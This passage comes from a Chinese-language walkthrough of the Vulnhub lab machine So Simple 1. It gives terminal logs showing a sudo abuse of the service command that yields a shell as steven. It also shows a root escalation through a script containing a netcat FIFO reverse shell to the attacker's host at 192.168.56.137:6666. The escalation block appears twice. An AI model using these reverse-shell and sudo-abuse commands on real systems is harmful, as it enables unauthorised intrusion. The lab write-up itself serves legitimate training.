-rw-r--r-- 1 steven steven  220 Jul 12  2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12  2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13  2020 .local
-rw-r--r-- 1 steven steven  807 Jul 12  2020 .profile
-rwxr-x--- 1 steven steven   33 Jul 13  2020 user2.txt
max@so-simple:/home/steven$ cat user2.txt
cat: user2.txt: Permission denied
max@so-simple:/home/steven$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service
Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service ../../bin/sh
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ 

参考GTFOBINS网站的方法,利用service命令拿到steven的shell

steven@so-simple:/$ cd /home
steven@so-simple:/home$ cd steven
steven@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15  2020 .
drwxr-xr-x 4 root   root   4.0K Jul 12  2020 ..
-rw-r--r-- 1 steven steven  220 Jul 12  2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12  2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13  2020 .local
-rw-r--r-- 1 steven steven  807 Jul 12  2020 .profile
-rwxr-x--- 1 steven steven   33 Jul 13  2020 user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
steven@so-simple:/home/steven$ 

这样就拿到了第二个flag

提权

steven@so-simple:/$ cd /opt
steven@so-simple:/opt$ ls
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ touch server-health.sh
steven@so-simple:/opt$ cd tools
steven@so-simple:/opt/tools$ vi server-health.sh
steven@so-simple:/opt/tools$ cat server-health.sh
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 6666 >/tmp/f
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh

到/opt目录后,发现没有tools目录以及server-health.sh文件,创建它们,然后执行,从而拿到root shell

steven@so-simple:/$ cd /opt
steven@so-simple:/opt$ ls
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ touch server-health.sh
steven@so-simple:/opt$ cd tools
steven@so-simple:/opt/tools$ vi server-health.sh
steven@so-simple:/opt/tools$ cat server-health.sh
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 6666 >/tmp/f
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 6666             
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 54008
root@so-simple:/opt/tools# 
root@so-simple:/opt/tools# 
root@so-simple:/opt/tools# 
root@so-simple:/opt/tools# 
root@so-simple:/opt/tools# 
root@so-simple:/opt/tools# id
id
uid=0(root) gid=0(root) groups=0(root)
root@so-simple:/opt/tools# cd /root
cd /root
root@so-simple:~# ls -alh
ls -alh
total 40K
drwx------  5 root root 4.0K Jul 15  2020 .
drwxr-xr-x 20 root root 4.0K Jul 12  2020 ..
-rw-r--r--  1 root root 3.1K Jul 15  2020 .bashrc
drwx------  2 root root 4.0K Jul 12  2020 .cache
-rw-------  1 root root   28 Jul 15  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jul 12  2020 .local
-rw-------  1 root root  282 Jul 14  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root 3.7K Jul 12  2020 flag.txt
drwxr-xr-x  4 root root 4.0K Jul 12  2020 snap
root@so-simple:~# cat flag.txt
cat flag.txt


  /$$$$$$                                                     /$$              /$$                                   
 /$$__  $$                                                   | $$             | $$                                   
| $$  \__/  /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$  /$$$$$$  /$$$$$$  /$$$$$$$$| $$                                   
| $$       /$$__  $$| $$__  $$ /$$__  $$ /$$__  $$|____  $$|_  $$_/ |____ /$$/| $$                                   
| $$      | $$  \ $$| $$  \ $$| $$  \ $$| $$  \__/ /$$$$$$$  | $$      /$$$$/ |__/                                   
| $$    $$| $$  | $$| $$  | $$| $$  | $$| $$      /$$__  $$  | $$ /$$ /$$__/                                         
|  $$$$$$/|  $$$$$$/| $$  | $$|  $$$$$$$| $$     |  $$$$$$$  |  $$$$//$$$$$$$$ /$$                                   
 \______/  \______/ |__/  |__/ \____  $$|__/      \_______/   \___/ |________/|__/                                   
                               /$$  \ $$                                                                             
                              |  $$$$$$/                                                                             
                               \______/                                                                              
 /$$     /$$                  /$$                                                                           /$$      
|  $$   /$$/                 | $/                                                                          | $$      
 \  $$ /$$//$$$$$$  /$$   /$$|_//$$    /$$ /$$$$$$         /$$$$$$  /$$  /$$  /$$ /$$$$$$$   /$$$$$$   /$$$$$$$      
  \  $$$$//$$__  $$| $$  | $$  |  $$  /$$//$$__  $$       /$$__  $$| $$ | $$ | $$| $$__  $$ /$$__  $$ /$$__  $$      
   \  $$/| $$  \ $$| $$  | $$   \  $$/$$/| $$$$$$$$      | $$  \ $$| $$ | $$ | $$| $$  \ $$| $$$$$$$$| $$  | $$      
    | $$ | $$  | $$| $$  | $$    \  $$$/ | $$_____/      | $$  | $$| $$ | $$ | $$| $$  | $$| $$_____/| $$  | $$      
    | $$ |  $$$$$$/|  $$$$$$/     \  $/  |  $$$$$$$      | $$$$$$$/|  $$$$$/$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$      
    |__/  \______/  \______/       \_/    \_______/      | $$____/  \_____/\___/ |__/  |__/ \_______/ \_______/      
                                                         | $$                                                        
 /$$ /$$$$$$                   /$$$$$$  /$$              | $$       /$$          /$$                                 
| $//$$__  $$                 /$$__  $$|__/              |__/      | $$         | $/                                 
|_/| $$  \__/  /$$$$$$       | $$  \__/ /$$ /$$$$$$/$$$$   /$$$$$$ | $$  /$$$$$$|_/                                  
   |  $$$$$$  /$$__  $$      |  $$$$$$ | $$| $$_  $$_  $$ /$$__  $$| $$ /$$__  $$                                    
    \____  $$| $$  \ $$       \____  $$| $$| $$ \ $$ \ $$| $$  \ $$| $$| $$$$$$$$                                    
    /$$  \ $$| $$  | $$       /$$  \ $$| $$| $$ | $$ | $$| $$  | $$| $$| $$_____/                                    
   |  $$$$$$/|  $$$$$$/      |  $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$|  $$$$$$$                                    
    \______/  \______/        \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/                                    
                                                         | $$                                                        
                                                         | $$                                                        
                                                         |__/                                                        

Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79


root@so-simple:~# 
v

成功拿到了root flag!!!

哈哈,感觉这个靶机名不副实,不简单!

标签:56.171,http,Simple,192.168,simple,So,Vulnhub,steven,wordpress
From: https://www.cnblogs.com/jason-huawen/p/16884208.html

相关文章